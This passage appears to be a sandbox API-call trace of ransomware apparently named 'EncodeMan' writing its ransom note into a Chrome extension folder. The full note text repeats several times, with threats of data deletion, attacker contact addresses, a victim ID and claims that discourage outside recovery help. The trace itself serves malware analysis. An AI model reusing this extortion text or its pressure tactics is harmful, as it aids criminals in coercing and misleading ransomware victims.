\\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.190] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.191] CloseHandle (hObject=0x2ec) returned 1 [0291.191] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\#readme_eman#.rtf")) returned 0xffffffff [0291.191] GetLastError () returned 0x2 [0291.191] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.192] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.192] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.192] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. 